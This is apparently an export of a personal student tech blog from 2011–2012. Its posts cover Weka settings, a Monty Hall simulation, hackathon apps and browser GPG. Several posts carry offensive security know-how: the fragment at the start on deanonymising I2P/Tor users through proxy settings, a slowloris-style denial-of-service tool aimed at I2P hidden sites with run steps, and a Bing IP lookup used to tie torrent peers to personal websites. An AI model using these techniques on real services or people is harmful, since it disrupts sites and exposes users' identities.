<p><strong>Note how I use regex to chose the proxy settings.</strong> This allows for an attacker to trick my browser to call a server outside of the I2P network.</p>
<button id="test" >Try it out here</button>
<p>If this shows your normal IP address and not the <span class="caps">TOR</span>/I2P (localhost) then you must review your proxysettings!</p>
<p>Here is a image of me accessing the I2P version of this blog with bad proxy settings.</p>
<center><a href="/images/deanon.jpeg"><img src="/images/deanon.jpeg" width="500px" /></center>Weka out of memory crash on OS X2012-09-26T00:00:00+02:00http://blog.kejsarmakten.se/all/software/2012/09/26/Weka-memory-crash-OSX<h2>Weka out of memory crash on OS X</h2>
<p class="publish_date">26 Sep 2012</p>
<p>Using some bigger dataset makes the machine learning program Weka crash due to lack of memory.</p>
<p>To increase the memory limit Weka is allowed to use before it crashes edit the file</p>
<pre class="terminal">/Applications/weka-3-7-5.app/Contentsi/Info.plist</pre>
<p>(for the version number you have on your Weka install)</p>
<p>Change the line</p>
<pre class="terminal">&lt;string&gt;-Xmx256M&lt;/string&gt;</pre>
<p>To</p>
<pre class="terminal">&lt;string&gt;-Xmx2g&lt;/string&gt;</pre>
<p>The 2g means that it allows Weka to use 2GB memory, you can change this to what best suits you.</p>Layer 7 DOS against I2P darknet2012-09-11T00:00:00+02:00http://blog.kejsarmakten.se/all/projects/2012/09/11/dark-loris<h2>Layer 7 <span class="caps">DOS</span> against I2P darknet</h2>
<p class="publish_date">11 Sept 2012</p>
<p><a href="https://github.com/melpomene/Darkloris">Download here</a></p>
<p>I wrote a small proof of concept in python for a slowloris attack performed against hidden sites on the I2P darknet.</p>
<p>The idea comes from the <a href="http://en.wikipedia.org/wiki/Slowloris">Slowloris attack</a> where the attacker depletes the web servers resourses by initiating a few very slow request, filling up the sockets and rendering the site unaccesable.</p>
<p>Since the attack works on layer 7 (sending partial <span class="caps">GET</span> requests), it works very well over darknets like <a href="https://torproject.org"><span class="caps">TOR</span></a> or <a href="https://i2p2.de">I2P</a>.</p>
<p>One way to protect against against the Slowloris attack is to limit the time a client is allowed to stay connected, but this proves hard in a high latency enviroment like the I2P darknet.</p>
<p><strong>How does it work</strong></p>
<p>First I open a socks proxy in my I2P configurations on port 4475.</p>
<p>Then I run the script with the host (change the host variable to i.e. the base32 address) I want to take down.</p>
<pre class="terminal">
&gt;python darkloris.py
</pre>
<p>Before script is fired. <br />
<center><a href="/images/darkloris-1.jpg"><img src="/images/darkloris-1.jpg" width="600px" /></a></center><br />
After script is fired.<br />
<center><a href="/images/darkloris-2.jpg"><img src="/images/darkloris-2.jpg" width="600px" /></a></center></p>
<p>Please remember that Denial of Service-attacks are illegal. Only use this script when trying to secure your own eepsite against this kind of attacks.<br />
A good tip is to lower the amount of connections one IP is allowed to have to your site at a given moment.</p>
<p><strong>Update</strong></p>
<p>As the goog people at <a href="http://forum.i2p/viewtopic.php?p=44926">forum.i2p</a> pointed out there are good protections against this attack built in to the i2p routing software. It is not activated by default but you can find it on the advanced settings <a href="http://localhost:7657/i2ptunnel/">for the server tunnel</a>.</p>
<p>In the advanced panel you can limit the amount of incoming connections from one client per minute/hour/day. Here is a screen dump of the settings (but unfortunately in Swedish).<br />
<center><a href="/images/doris3.jpg"><img src="/images/doris3.jpg" width="600px" /></a></center></p>This fall (Maximum warp!)2012-08-31T00:00:00+02:00http://blog.kejsarmakten.se/all/personal/2012/08/31/this-fall<h2>This fall (Maximum warp!)</h2>
<p class="publish_date">31 Aug 2012</p>
<p>Last year on my masters program starts on monday. Looking forward to a highly interesting year!<br />
First I will kickstart the term with 150 % fulltime study (how can I remove one of these <a href="http://kurser.lth.se/kursplaner/12_13%20eng/EDAN55.html">Advanced Algroithms</a>, <a href="http://kurser.lth.se/kursplaner/12_13%20eng/EITN50.html">Advanced Computer Security</a> and <a href="http://kurser.lth.se/kursplaner/12_13%20eng/EDAN20.html">Language technology</a> ?).</p>
<p>Hopefully I will begin writing my master thesis during the fall as well, <a href="http://blog.kejsarmakten.se/all/software/2012/04/28/looking-for-interesting-master-thesis.html">if I can find an interesting project</a>. (Please drop me an <a href="mailto:christopher.kack@gmail.com">email</a> if you have any suggestions!)</p>
<p>I am also moving away from my beloved Lund to Malmö in September.</p>
<p>Besides this I am planning on improving my skills in Scala and maybe organising a <a href="http://www.cryptoparty.org/wiki/CryptoParty">cryptoparty in Lund</a>.</p>
<p><a href="http://youtu.be/sHyy6F_GgsM">Maximum warp, punch it!</a></p>Copyright trolling2012-08-21T00:00:00+02:00http://blog.kejsarmakten.se/all/personal/2012/08/21/copy-right-trolling<h2>Copyright trolling</h2>
<p class="publish_date">21 Aug 2012</p>
<p>Security Researchers are often swapping malware code to help each other analyse threats.</p>
<p>With our current innovation impeding copyright laws, doesn&#8217;t this constitute copy right infringement?<br />
If I would write something that looks like a malware, and it is passed around (publicly on twitter!), would the Rättighetsalliansen help me collect?</p>
<p>I mean, <a href="http://blogs.hbr.org/cs/2012/08/who_cares_if_samsung_copied_ap.html">otherwise people might stop innovating!?</a></p>The killer in the Song of Joy2012-08-03T00:00:00+02:00http://blog.kejsarmakten.se/all/personal/2012/08/03/the-singer-did-it<h2>The killer in the Song of Joy</h2>
<p class="publish_date">03 Aug 2012</p>
<p>Just to clear up any questionmarks regarding <strong>the song of joy</strong> by Nick Cave; <br />
<center><strong>The singer is the killer</strong></center></p>
<p>How do we know?</p>
<pre class="terminal">
They never caught the man
He's still on the loose
It seems he has done many many more
Quotes john milton on the walls in the victim's blood
The police are investigating at tremendous cost
In my house he wrote 'his red right hand'
*That, I'm told is from paradise lost*
</pre>
<p>Note the last line.</p>
<pre class="terminal">
the sun to me is dark
and silent as the moon
</pre>
<p>This part is a quote from <a href="http://www.bartleby.com/4/602.html" title="line 85">John Miltons Samson Agonistes</a>.</p>Make it pixly!2012-08-01T00:00:00+02:00http://blog.kejsarmakten.se/all/projects/2012/08/01/make-it-pixly<h2>Make it pixly!</h2>
<p class="publish_date">01 Aug 2012</p>
<p>Just a quick note.</p>
<p>I wanted to play around a little with the excelent <a href="http://www.pythonware.com/products/pil/">Python Image Library</a> so I wrote a small flask script that transforms a picture into pixelart. Nothing fancy. But make sure to check out <span class="caps">PIL</span> and if you want to try it out, go ahead (jpg + png only).</p>
<form id="form" action="http://pixel.kejsarmakten.se/pixel" method="POST" enctype="multipart/form-data">
<input id="imagefile" name="imagefile" type="file" />
<input id="submit" type="submit" value="Make pixly!" />
</form>
<p><br /></p>Bokus eller Adlibris2012-08-01T00:00:00+02:00http://blog.kejsarmakten.se/all/projects/2012/08/01/bokus-eller-adlibris<h2>Bokus eller Adlibris</h2>
<p class="publish_date">09 Jul 2012</p>
<p>Ett mindre hack jag skrev ihop för att döda tid när jag väntade på diskkryptering.</p>
<p>Eftersom jag har ett omättligt sug efter bra litteratur så spenderar jag stora delar av mitt <span class="caps">CSN</span> på att inhandla böcker. <br />
När jag ser en bok jag vill köpa är alltid den eviga frågan <em>skall jag köpa den på bokus eller adlibris?</em><br />
De två stora internetbokhandlarna brukar variera några kronor i pris mellan varandra, men vilken som är billigast varierar mellan titlarna.</p>
<p>För att snabbt kunna verifiera detta (då <a href="http://www.bokfynd.nu/">bokfynd.nu</a> inte stödjer sökningar mot bokus) så skrev jag ihop ett snabbt litet hack.</p>
<p><a href="http://bokuselleradlibris.kejsarmakten.se/">Vill ni testa hostas den här</a></p>
<p><strong>Uppdatering</strong> Efter förändringar i strukturen på adlibris och bokus fungerar inte scriptet längre som det skall och behöver uppdateras för att fungera igen. Detta ligger långt ner på min &#8220;att-göra-lista&#8221;. Jag föreslår tills vidare att ni använder Adlibris, då <a href="http://www.dn.se/ekonomi/bokaffarer-saljer-guider-om-knarkodling/">Bokus är mycket kvickare till censur</a></p>The Monty Hall problem emulation2012-07-09T00:00:00+02:00http://blog.kejsarmakten.se/all/software/2012/07/09/Monty-Hall<h2>The Monty Hall problem emulation</h2>
<p class="publish_date">09 Jul 2012</p>
<p>Since I first heard of the Monty Hall problem it has been itching my intellect.<br />
If you haven&#8217;t heard of the problem there is a good explanation of it over <a href="https://en.wikipedia.org/wiki/Monty_Hall_problem">on wikipedia</a>.</p>
<p>The idea is that you are on a game show, where there are three doors. You will get to keep whatever is behind the door you choose. <br />
Behind one of them there is a car, and behind the other two there are donkeys. <br />
First you will get to choose a door, but you can not see what is behind it. <br />
After this the host will open another door, behind which he will reveal a donkey.</p>
<p>You are now left with a choice, stay with the door you choose from the beginning or change to the door that the host didn&#8217;t open.</p>
<p>Will the change of door increase or decrease your chance of getting the car?</p>
<p>Intuitively I would not think that there would be a difference, but according to wikipedia, and my maths lecturer there will be. If you switch door there is a greater change (2/3) of winning the car, than if you stay(1/3). This seems a bit strange to me so I naturally decided to write up a small script to get some statistics on it.</p>
<p>The script can be found on <a href="https://gist.github.com/3077712">my gist page on github</a>.</p>
<p>The best part? You call it with<br />
<pre class="terminal">python Monty.py</pre></p>
<p>Theory seems to win over intuition again.</p>
<pre class="terminal">
&gt;python Monty.py
Run game. Change everytime. 10000000 iterations.
Wins: 6667411 Loses: 3332589
Run game. Never change. 10000000 iterations.
Wins: 3335638 Loses: 6664362
</pre>Setting up a web store2012-06-14T00:00:00+02:00http://blog.kejsarmakten.se/all/software/2012/06/14/tictail<h2>Setting up a web store</h2>
<p class="publish_date">14 Jun 2012</p>
<p>I helped my girlfriend to set up her web store a few days ago (she makes and sells bowties, <a href="http://store.sabinamodee.se">check it out</a>). <br />
It was made really simple by a nice web service I found called <a href="http://tictail.com">tictail</a>, &#8220;the tumblr for e-commerce&#8221;.</p>
<p><a href="http://store.sabinamodee.se"><img src="https://fbcdn-sphotos-a.akamaihd.net/hphotos-ak-ash3/8075_474011359291508_1353899747_n.jpg" width="550px" alt="Modée Design" /></a></p>
<p>With a really simple interface you can choose one of several nice themes (which you can later modify in a neat little online editor), and then add your products without much fuzz.<br />
For payments you use either PayPal or Klarna (we tried out PayPal first and it was just a few clicks to get going).</p>
<p>Best of all? &#8211; It is free.<br />
Their buissnes model is based on celling addons for the service (to enable discount codes and such).</p>[Ej längre] Söker examensarbete i Datavetenskap [Looking for CS master thesis]2012-04-28T00:00:00+02:00http://blog.kejsarmakten.se/all/software/2012/04/28/looking-for-interesting-master-thesis<h2>[Ej längre] Söker examensarbete i Datavetenskap [Looking for CS master thesis]</h2>
<p class="publish_date">28 Apr 2012</p>
<p><strong>Update</strong><br />
Söker ej något examensarbete längre då jag har hittat ett mycket intressant arbete tillsammans med Stickybit i Malmö!</p>
<p><strong>Old post</strong><br />
Nästa höst börjar mitt sista år på civilingenjörsprogrammet i Datateknik på Lunds Tekniska Högskola (<span class="caps">LTH</span>). <br />
Detta innebär att det är tid för mig att börja söka efter ett examensarbete. <br />
Examensarbetena är 30 HP (motsvarar en termins heltidsstudier) avancerade poäng.</p>
<p>Som det ser ut nu skulle jag gärna göra ett examensarbete inom <em>artificiell intelligens</em>, <em>maskininlärning</em> eller <em>informationsinhämtning</em>, då dessa tre ämnena ligger mig varmt om hjärtat.</p>
<p>Gärna i Öresundsregionen (Lund, Malmö, Helsingborg eller Köpenhamn) men jag är öppen för förslag på andra orter med.</p>
<p>Har du några förslag på idéer på exjobb så skicka mig gärna ett mail (christopher.kack [a] gmail.com) eller lämna en kommentar nedan. <br />
Både intressanta företag och projektidéer som kan utföras på institutionen uppskattas.</p>
<p><strong>English summary</strong><br />
Next year is my last year on my masters degree in computer science at the University of Lund (<span class="caps">LTH</span>). <br />
This means that I will be doing some kind of advanced work for 30 HP (1 term of full time studies).<br />
I have yet to decide what to work on though.</p>
<p>Right now I would prefer working with something concerning <em>Artificial Intelligence</em>, <em>Machine Learning</em> or <em>Information Retrieval</em>.</p>
<p>If anyone has any ideas for good projects please send me an email to christopher.kack [a] gmail.com or leave a comment below, it would be very appreciated.</p>Robot friends2012-04-27T00:00:00+02:00http://blog.kejsarmakten.se/all/personal/2012/04/27/small-robots<h2>Robot friends</h2>
<p class="publish_date">27 Apr 2012</p>
<p>I&#8217;ve bumped in to some interesting small robots for home use. <br />
I really, really, really want to get my hands on one of these little critters.</p>
<p>First up is the Open Source <a href="http://thecorpora.com/">Qbo</a>.</p>
<center>
<p><iframe width="420" height="315" src="http://www.youtube.com/embed/EIxoiLmy5mM" frameborder="0" allowfullscreen></iframe></p>
</center>
<p>I also bumped into <a href="http://www.aldebaran-robotics.com/">Nao</a>.<br />
<center><br />
<iframe width="560" height="315" src="http://www.youtube.com/embed/nNbj2G3GmAo" frameborder="0" allowfullscreen></iframe></p>
</center>
<p>Do you know any more small robots belonging in this list? Please comment below!</p>
<p>It would be lovley to have one of these running around at home to keep me, my girlfriend and our pug company. It gives a whole new perspective to network security though. Would not be very nice to have an agent walking about the house rooted by an attacker (stuff horror movies are made of).</p>
<p>Nice to see that both are produced in Europe!</p>
<p>Compare to the American robot below ;)<br />
<center><br />
<iframe width="560" height="315" src="http://www.youtube.com/embed/cWmbqH_z7jM" frameborder="0" allowfullscreen></iframe></p>
</center>
<p><strong>Update</strong><br />
There is so much robot awesomeness out there.</p>
<center><iframe width="420" height="315" src="http://www.youtube.com/embed/nWd56Qj5548" frameborder="0" allowfullscreen></iframe></center>The face of Watson2012-04-27T00:00:00+02:00http://blog.kejsarmakten.se/all/personal/2012/04/27/face-of-watson<h2>The face of Watson</h2>
<p class="publish_date">27 Apr 2012</p>
<p>We had <span class="caps">IBM</span> dropping by <span class="caps">LTH</span> today to hold a short presentation of their AI project <a href="http://www-03.ibm.com/innovation/us/watson/">Watson</a>.<br />
It was a short 45 minute speach so they did not have time to go in to any depth, but luckily we have disscussed Watson in our Applied Artificial Intelligence course.<br />
One of the speakers recommended us to check out the video on the design of Watsons inter<i>face</i>. <br />
I found this inspiring video and felt like sharing it.</p>
<center>
<p><iframe width="560" height="315" src="http://www.youtube.com/embed/WIKM732oEek" frameborder="0" allowfullscreen></iframe></p>
</center>Berlin Books2012-04-07T00:00:00+02:00http://blog.kejsarmakten.se/all/projects/2012/04/07/berlinbooks<h2>Berlin Books</h2>
<p class="publish_date">07 Apr 2012<br />
<br />
<center><a href="http://berlinbooks.herokuapp.com/"><img src="/images/berlinbook.png" width="500px" /></a></center> <br />
For the <a href="http://blog.readmill.com/post/20361026851/schiffihack-2-the-results">Readmill hackathon</a> I and <a href="https://plus.google.com/117983584799068299901">Carl Ekerot</a> wrote a small book recommendation webapp.</p>
<p>What it does is that it compares your facebook book related likes (authors, books and so on) to your friends, and then it finds the friends which you have the most similar taste to and recommends some books that you haven&#8217;t read (read &#8220;liked&#8221;) from them. <br />
We mostly wrote it because we wanted to play around with recommendation systems a little, but a fever put a stop to our hacking rather early in the night so this basic solution was what we had time for. <br />
We are still thinking about adding some improvements, we&#8217;ll see how it goes!</p>
<p>It is still a hack and lacks logout button and other necessities, but we put it up on Heroku if you want to <a href="http://berlinbooks.herokuapp.com/">check it out!</a>. Please report back any bugs you find to us either here or on <a href="https://twitter.com/#!/kejsarmakten">twitter</a>.</p>Readmill hackathon2012-04-03T00:00:00+02:00http://blog.kejsarmakten.se/all/personal/2012/04/03/readmill-hack<h2>Readmill hackathon</h2>
<p class="publish_date">04 Apr 2012</p>
<p>Spent the weekend on the <a href="http://blog.readmill.com/post/20361026851/schiffihack-2-the-results">Readmill hackathon</a> with <a href="https://plus.google.com/117983584799068299901">Carl Ekerot</a>. <br />
We both had a blast and wrote a book recommendations system connected to facebook. It goes under the workname Berlin Books and we are now porting it over to heroku so you can try it out!</p>
<p><b>Update</b> <a href="http://blog.kejsarmakten.se/all/projects/2012/04/07/berlinbooks.html">See the result here</a></p>
<p>Dropping some pictures from the trip. Oh, how I love Berlin.</p>
<center>
<p><a href="/images/rm1.jpg"><img src="/images/rm1.jpg" style="float:left;" width="300px" /></a><a href="/images/rm2.jpg"><img src="/images/rm2.jpg" style="float:left;" width="300px" /></a><a href="/images/rm3.jpg"><img src="/images/rm3.jpg" style="float:left; clear:both;"width="300px" /></a><a href="/images/rm4.jpg"><img src="/images/rm4.jpg" style="float:left;" width="300px" /></a><a href="/images/rm5.jpg"><img src="/images/rm5.jpg" style="float:left; clear:both;" width="300px" /></a><br />
<div style="clear:both;" /></p>Functional hack time lapse2012-02-08T00:00:00+01:00http://blog.kejsarmakten.se/all/personal/2012/02/08/functional-hack-time-lapse<h2>Functional hack time lapse</h2>
<p class="publish_date">08 Feb 2012</p>
<p>A time lapse of me and <a href="https://kd35a.se">kd35a</a> working on a all night coding session before a deadline in our functional programming course.<br />
<iframe src="http://player.vimeo.com/video/32296837" width="500" height="281" frameborder="0" webkitAllowFullScreen mozallowfullscreen allowFullScreen></iframe><br />
(The time lapse only cover a few hours until the battery died on my <span class="caps">GOPRO</span> Hero).</p>
IP keyword in Bing.com2012-02-02T00:00:00+01:00http://blog.kejsarmakten.se/all/software/2012/02/02/interesting-bing<h2>IP keyword in Bing.com</h2>
<p class="publish_date">02 Feb 2012</p>
<p>I found something in Bing.com today that I found quite interesting (:O yes I know!).</p>
<p>There is a search keyword called <a href="http://msdn.microsoft.com/en-us/library/ff795671.aspx">ip</a>, which returns all sites known to Bing that are hosted on that IP.</p>
<p>With the help of this I managed to indentify and connect serveral IP addresses, from my torrent client, to personal websites. <br />
Normally people tend to feel that they are safe from indentification when they share IP with their webserver if they just tell the webserver not to respont to requests through the IP address and restrict it to access through the domain name.</p>
<p>I wrote a small script to wrap the Bing.com <span class="caps">API</span>, here is the enpoint</p>
<pre class="terminal">http://links.kejsarmakten.se/ip/index.php?ip=[IP HERE]</pre>
<p>Example usage</p>
<pre class="terminal">curl http://links.kejsarmakten.se/ip/index.php?ip=8.8.8.8</pre>
<p><strong>Update</strong><br />
It seems bing has changed their <span class="caps">API</span> and my wrapper no longer works.</p>Flattr Video Browser2012-02-02T00:00:00+01:00http://blog.kejsarmakten.se/all/projects/2012/02/02/flattr-video-browser<h2>Flattr Video Browser</h2>
<p class="publish_date">02 Feb 2012</p>
<p>The Flattr Video Browser is a Python project I wrote for the <a href="http://blog.flattr.net/2012/01/developer-challenge-january-edition-its-a-go/">Flattr <span class="caps">API</span> challenge</a><br />
<center><a href="http://flattr.kejsarmakten.se:8080/">The Flattr Video Browser</a><br />
<a href="/images/videobrowser.jpg" target="_blank"><img src="/images/videobrowser.jpg" width="400" alt="Flattr Video Browser" /></a></center></p>
<p>The project combines the Flattr <span class="caps">API</span> with the power of OEmbed and allows you to browse trending videos on Flattr. <br />
For more infromation go to the <a href="http://flattr.kejsarmakten.se:8080/about/">about page</a> (it also contains a picture of me posing with my pug).</p>Akta för ACTA2012-01-26T00:00:00+01:00http://blog.kejsarmakten.se/all/personal/2012/01/26/akta-ACTA<h2>Akta för <span class="caps">ACTA</span></h2>
<p class="publish_date">26 Jan 2012</p>
<p>Well, the Americans just won their first small battle against the IP-mafia.<br />
Now it is Europes turn, <span class="caps">ACTA</span> is about to be signed. <br />
<center><br />
<a href="https://www.laquadrature.net/wiki/images/7/76/Acta-infographics.png"><img src="https://www.laquadrature.net/wiki/images/7/76/Acta-infographics.png" width="200px"/></a></p>
</center>
<p><iframe src="http://mediakit.laquadrature.net/embed/716?size=medium"
style="width: 640px; height: 500px; border: 0; overflow: hidden"></iframe></p>
<p><a href="http://translate.google.com/translate?hl=en&amp;ie=UTF8&amp;prev=_t&amp;rurl=translate.google.com&amp;sl=pl&amp;tl=en&amp;twu=1&amp;u=http://krakow.gazeta.pl/krakow/1,35798,11032507,Manifestacja_w_Krakowie__protest_przeciwko_ACTA.html">In Poland there is 15.000 people protesting on the streets</a>. <br />
Let us follow their good example.</p>
Learn You a Haskell for Great Good2011-12-18T00:00:00+01:00http://blog.kejsarmakten.se/all/software/2011/12/18/learn-you-a-haskell<h2>Learn You a Haskell for Great Good</h2>
<p class="publish_date">18 Dec 2011</p>
<p>On monday is my exam in <a href="http://cs.lth.se/edan40">functional programming</a> and I wanted to round of the course with a short note on my course littrature.<br />
<center><br />
<a href="http://learnyouahaskell.com/"><img src="http://nostarch.com/sites/default/files/imagecache/product_full/lyah.png" height="300px" /></a></center></p>
<p>Well, it is not really <span class="caps">THE</span> course litterature, but the course does not follow a particular book really closely. <br />
So I choose to go with this book (got hold of a copy through a <a href="http://news.ycombinator.org">Hacker News</a> sale) and <em>Oh</em> am I glad I did.</p>
<p>It is written by a slovenian Computer Scientist named Miran Lipovača. Miran has a wonderful sense of humor and is a great teacher. The book is a wonderful read and the mixture of humor and an understanding for the hard parts in Haskell makes it a fun way to learn the language (unlike most course litterature I have stumbled across so far).</p>
<p>And yeah, did I mention it is <a href="http://learnyouahaskell.com/chapters"><span class="caps">FREE</span> to read online</a>?</p>Android 4 security improvements2011-12-16T00:00:00+01:00http://blog.kejsarmakten.se/all/software/2011/12/16/android-4<h2>Android 4 security improvements</h2>
<p class="publish_date">16 Dec 2011</p>
<p>Just got my <em>Galaxy Nexus</em> phone with a clean Android 4 install.<br />
Here are some quick initial reactions:<br />
There seem to be two new security features (compared to my old <span class="caps">HTC</span> Hero with Android 1.6) that I just noticed.</p>
<p>Seems like it supports some sort of disc encryption!</p>
<center><a href="/images/encryptandroid.png"><img src="/images/encryptandroid.png" height="400px"></a></center>
<p>Also, you can choose what CA&#8217;s to trust! <a href="/all/software/2011/10/11/convergence.html">Choose whom to trust!</a></p>
<center><a href="/images/chooseca.png"><img src="/images/chooseca.png" height="400px"></a></center>
<p><em>Great news everyone!</em></p>
<p><strong>Update 17/12/2011</strong><br />
I am having a few concerns regarding the encryption introduced. I have started a disscustion around it on the <a href="http://android.stackexchange.com/q/17086/10700">android stackexchange</a>, feel free to contribute with your thoughts. <br />
The encryption forces the use of the same password/<span class="caps">PIN</span> for the screen unlock as for the decryption. Thus discouraging the use of secure passwords or passphrases (hands up, who wants to write a 17 mixed case letter and digit password on the onscreen keyboard, everytime you want to check your phone or send a text messsage?).</p>
<p>I tried to encrypt my phone last night and it seem to have crashed in the middle of the encryption. Claiming it was aborted (I left it alone connected to a charger), and in need a factory reset. Rather annoying, even though the second try was successful. So beware that this might happen if you encrypt your phone.</p>Javascript GPG: Protect your webmail2011-11-25T00:00:00+01:00http://blog.kejsarmakten.se/all/software/2011/11/25/pgp-javascript<h2>Javascript <span class="caps">GPG</span>: Protect your webmail</h2>
<p class="publish_date">25 Nov 2011</p>
<p>I just tried out <a href="http://gpg4browsers.recurity.com/">GPG4Browsers</a> in Google Chrome. <br />
It is a Javascript implementation of OpenGPG (only missing key generation).</p>
<p>It is really easy to install in Chrome, <a href="http://gpg4browsers.recurity.com/">just follow the steps on the website</a>. <br />
At the moment the plugin only seems to work with Gmail and in Chrome, but hopefully this will change soon and both Firefox plugins and support for other webclients like Roundcube will be available (the hard part, writing the Javascript OpenGPG implementation, is done so now its just a matter of packaging).</p>
<p><a href="https://img.skitch.com/20111125-b8j73kk991npcnsyqebgcp9cte.jpg"><img width="600px" src="https://img.skitch.com/20111125-b8j73kk991npcnsyqebgcp9cte.jpg" alt="The plugin at work" /></a></p>
<p>The Chrome plugin adds a little button in the adress field when you log in to Gmail that enables you to create a new encrypted message (and import keys from the keyserver of your choice and such).</p>
<p>It also detects if a message seems to be encrypted with <span class="caps">PGP</span> and ask you if you want to decrypt it.</p>
<p><strong>So&#8230; what does this mean?</strong><br />
Well, it means that you can have encrypted conversations with people.</p>
<ul>
<li>This will stop Gmail from analyzing your emails and sending you directed ads.</li>
<li>This will stop snooping people in your surrondings (at work, in school or whereever) from reading your email.</li>
<li>This will stop people from being able to read your email if they get hold of your email password or your email server is hacked (they would also need your private key and your passphrase to the key)</li>
<li>This will also protect the email from eavesdropping (if the person you email, or his email provider, doesn&#8217;t use propper <span class="caps">TLS</span>/properly encrypted wifi and so on).</li>
</ul>
<p><em><span class="caps">NOTE</span>: I have not reviewed the source code.</em></p>
<p><em>Note 1: The Chrome plugin opens a new window to encrypt and decrypt emails, hopefully this stops other javascripts to get hold of the clear text version of the email.</em></p>
<p><em>Note 2: I recently read on #cryptodotis that it is probable that the signing with <span class="caps">DSA</span> keys is broken with this plugin since the Random Number Generator in javascript is bad. This can be avoided with good implementation though, but it has not been confirmed for this project. Thus I recommend avoid signing with <span class="caps">DSA</span> keys with this implementation unless you first audit the code.</em></p>Wallpapers automatically from Tumblr2011-11-23T00:00:00+01:00http://blog.kejsarmakten.se/all/software/2011/11/23/image-from-tumblr-as-wallpaper<h2>Wallpapers automatically from Tumblr</h2>
<p class="publish_date">23 Nov 2011</p>
<p>Last night I wrote a small script that updates my background images daily to those from one of my favorite tumblr&#8217;s (<a href="http://welldressedfortheapocalypse.tumblr.com/">thanks Well dressed for the apaocalypse!</a>). <br />
Feel free to try it out. To do so you need to install <em>Feedparser</em> and <em>Beautifulsoup</em> (or just download them and put them in the same folder as the script). <br />
<a href="https://raw.github.com/melpomene/TumblrBackgroundFetcher/master/CollectBackground.py">Here is the Python script</a>, it is hosted on <a href="https://github.com/melpomene/TumblrBackgroundFetcher">Github</a> if you want to fork it. <br />
Put the script in <pre class="terminal">/etc/periodic/daily/</pre> to get it to upgrade your backgrounds daily.</p>
<p><strong>Do not forget to change the path variable in the script</strong> to your wallpaper folder where you store your background images.</p>
<p><img src="https://img.skitch.com/20111123-fj8ttn8t9xumgbq82ik2pgumdm.jpg" title="Add the same folder here and in the script path" alt="Add the same folder here and in the script path" /><br />
This is on OS X but the script should work on i.e. Linux to if you have installed automatical wallpaper switcher (create a crob job instead of the periodic folder).</p>
<p>Right now it only supports one blog, but if you care to collect pictures from more it is just a minor fix to the Python code. You can change what Tumblr it reads from by changing the <strong>tumblr_url</strong> variable.</p>
<p>Any questions? Drop a comment!</p>Myrmidonian Artifical Intelligence2011-11-16T00:00:00+01:00http://blog.kejsarmakten.se/all/software/2011/11/16/myrmidonian-ai<h2>Myrmidonian Artifical Intelligence</h2>
<p class="publish_date">16 Nov 2011</p>
<p>Our, obvoiusly mildly sadistic, leacturer in <em>Functional Programming</em> decided it was a good idea to show us a few live games of <a href="http://aichallenge.org">Googles AI challenge</a> before a lecture to distract us from our studies and other tasks at hand. <br />
Having considered buying a PS3 or xbox, for a few days, to play Skyrim just to experience the <a href="http://www.youtube.com/watch?v=ic6dKnv3WdU&amp;t=6m53s">Dragon AI</a> first hand, it was a given that I would give the challange a go. <br />
Buried under heavy workload I have not been able to give it a crack before today.</p>
<p>I just uploaded my first first code (after completing the tutorial) and could with fatherly love see my small <a href="https://en.wikipedia.org/wiki/Myrmidons">Myrmidons</a> win their first game!</p>
<p><a href="https://img.skitch.com/20111116-tm35bp31rgxwxpmtgqpfrest95.jpg"><img src="https://img.skitch.com/20111116-tm35bp31rgxwxpmtgqpfrest95.jpg" width="670px" alt="The very first game" /></a></p>
<p>I&#8217;ll update here as I add improvements. Any one else reading this participating? I&#8217;d love to grab a beer/coffie and discuss tactics.</p>
<h3>Update &#8211; The sinus dance</h3>
<p>Alright, first lines of code added and my little bots have played their first match. <br />
<strong>Victory again!</strong> My brave little warriors decided eating and copulating was their thing so it didn&#8217;t take long until the map was covered with Myrmidons. <br />
This they then decidied to <a href="http://aichallenge.org/visualizer.php?game=101389&amp;user=11117">celebrate with a syncronized sinus curve dance</a>.</p>
<p><a href="https://img.skitch.com/20111118-f8qet3qj1hs42wi9xu4dje4xsc.jpg"><img src="https://img.skitch.com/20111118-f8qet3qj1hs42wi9xu4dje4xsc.jpg" width="670px" alt="Shake that sinus curve!" /></a></p>
<h3>Update &#8211; Bitter defeat</h3>
<p>Alas, crushing defeat. Blindend by hybris my brave soldiers decided they would begin this game by sinus dancing (see above).<br />
But, we&#8217;ll learn for our misstakes. Just look at this population!<br />
<center><img src="https://img.skitch.com/20111118-dq5equpquqgu3hn2uthkts9wyh.jpg" title="Swarming, like fish! or birds!" alt="Swarming, like fish! or birds!" /> </center></p>
<p><strong>I <span class="caps">WANT</span> <span class="caps">THAT</span>!</strong> She moves in unison like spartans, a flock of birds or fish.<br />
She is defeated by this black magic though: <br />
<center><img src="https://img.skitch.com/20111118-m6p2iaphq89njeqwwpwwjs1krk.jpg" title="dark symbol ants conquer all" alt="dark symbol ants conquer all" /></center><br />
Some kind of awesome celtic cross. <em>Is celtic black magic cross what I really want</em>? <br />
Back to the drawing table!</p>Gittes tygkälla2011-11-11T00:00:00+01:00http://blog.kejsarmakten.se/all/personal/2011/11/11/gittes-tygkalla<h2>Gittes tygkälla</h2>
<p class="publish_date">11 Nov 2011</p>
<p><img src="/images/gittes.jpg" title="foto: Hugo Öringe" alt="foto: Hugo Öringe" /><br />
<em>A scary place</em></p>Blekingska nationens sångboksapp2011-10-25T00:00:00+02:00http://blog.kejsarmakten.se/all/projects/2011/10/25/blekingska-sangbokapp<h2>Blekingska nationens sångboksapp</h2>
<p class="publish_date">25 Oct 2011</p>
<p>Igår natt så gick vi live med Androidapplikation som jag har arbetat endel med, men som <a href="http://kd35a.se">Fredrik Strandin</a> är initiativtagare till. Applikationen är en digital sångbok, så att man slipper glömma ta med sig sångboken till sittningar i framtiden.</p>
<p>Jag har snickrat ihop en liten sida åt <a href="http://blekingska.kd35a.se/index.html">projektet här</a> och här finns <a href="https://github.com/kd35a/blekingskaSangbok">källkoden på GitHub</a> och här är applikationen på <a href="https://market.android.com/details?id=se.kd35a.blekingskaSangbok">android market</a>.</p>
<p>Här är en video där jag demonstrerar applikationen lite snabbt.</p>
<p><iframe width="420" height="315" src="https://www.youtube.com/embed/nVld0BFWgLk" frameborder="0" allowfullscreen></iframe></p>
<p>Titta på <a href="http://blekingska.kd35a.se/index.html">projektsidan</a> för att se hur man skall göra för att <strong>lägga till egna sångböcker</strong>.</p>Programming with Spock2011-10-23T00:00:00+02:00http://blog.kejsarmakten.se/all/software/2011/10/23/haskell<h2>Programming with Spock</h2>
<p class="publish_date">23 Oct 2011</p>
